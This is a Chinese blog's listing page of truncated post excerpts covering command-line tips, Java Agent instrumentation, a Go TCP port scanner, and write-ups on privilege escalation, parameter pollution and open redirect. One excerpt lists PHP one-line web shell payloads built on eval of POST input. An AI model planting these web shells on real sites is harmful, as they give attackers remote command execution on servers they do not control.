摘要: rz 上传 sz 下载 阅读全文
posted @ 2022-06-29 12:05 Azathoth_jk 阅读(7) 评论(0) 推荐(0) 编辑
摘要: windows: explorer 例子:explorer . 打开当前目录 linux: nautilus 例子: nautilus . 打开当前目录 没啥说的就是记录一下 阅读全文
posted @ 2022-06-29 11:43 Azathoth_jk 阅读(257) 评论(0) 推荐(0) 编辑
摘要: 在jdk 1.5之后引入的java.lang.instrument包提供了检测java程序的api,用于监控、收集性能信息、诊断问题等。通过 java.lang.instrument 实现的工具我们称之为 Java Agent ,Java Agent 能够在不影响正常编译的情况下来修改字节码,即动态 阅读全文
posted @ 2022-06-29 11:27 Azathoth_jk 阅读(399) 评论(0) 推荐(0) 编辑
摘要: from urllib import request import sys from urllib import parse import re base_url = "https://www.beianx.cn/search/" real_url = base_url + parse.quote( 阅读全文
posted @ 2022-06-23 17:09 Azathoth_jk 阅读(331) 评论(0) 推荐(0) 编辑
摘要: php: <?php @eval($_POST['attack' ]);?> <?php eval($_POST[1]);?> <script language="php">@eval($_POST['cmd'])</script> <?=eval($_POST['cmd']); <?php if( 阅读全文
posted @ 2022-06-21 17:07 Azathoth_jk 阅读(2229) 评论(0) 推荐(0) 编辑
摘要: 漏洞简述: 此漏洞本身并不复杂不过整个利用链很长,而且需要利用一个老漏洞 整个提权流程整体说下来可以分成两部分,分别利用了两个漏洞: 第一部分就是本漏洞主要更新点,可以通过利用这个漏洞而让我们自己设置一个恶意环境变量 第二部分是提权的点,可以通过设置一些恶意环境变量来达到执行命令的目的 漏洞详情: 阅读全文
posted @ 2022-04-15 19:35 Azathoth_jk 阅读(418) 评论(0) 推荐(0) 编辑
摘要: 漏洞简述: 攻击者在请求中注入了额外的参数,同时目标网站信任了这些参数并且导致了非预期的结果 漏洞危险性: 危险性可高可低,具体来说看可污染参数重要与否,不过多数的时候属于低危 漏洞用处: 此漏洞我个人认为最重要的用处时绕过认证,比如最简单的越权漏洞我们可以通过修改其uid来越权,而对这个漏洞的最常 阅读全文
posted @ 2022-04-15 16:44 Azathoth_jk 阅读(987) 评论(0) 推荐(0) 编辑
摘要: ###开放式重定向简介: 开放式重定向利用对一个给定域的信任诱使目标对象访问一个恶意web网站 ###危险性: 由于开放式重定向仅仅重定向用户,因此多数厂商认为他们的影响很小,很多时候都不会接受,owasp也在17年将开放式重定向移出了前10。 对于我个人来说这个漏洞对于厂商来说危害性不大,对个人来 阅读全文
posted @ 2022-04-15 16:11 Azathoth_jk 阅读(502) 评论(0) 推荐(0) 编辑
摘要: ###实现最简单的tcp扫描器: 最简单的tcp扫描器非常简单,我们只需要知道一个函数 net.Dial() Go语言中 Dial() 函数用于创建网络连接,函数原型如下: func Dial(network, address string) (Conn, error) { var d Dialer 阅读全文
posted @ 2022-03-25 19:03 Azathoth_jk 阅读(173) 评论(0) 推荐(1) 编辑
摘要: package main import ( "bufio" "fmt" "io" "os" ) func main() { openTxt("d:/Desktop/area.txt") } func openTxt(txt string) string { filePath := txt file, 阅读全文
posted @ 2022-02-22 15:42 Azathoth_jk 阅读(371) 评论(0) 推荐(0) 编辑
点击右上角即可分享
微信分享提示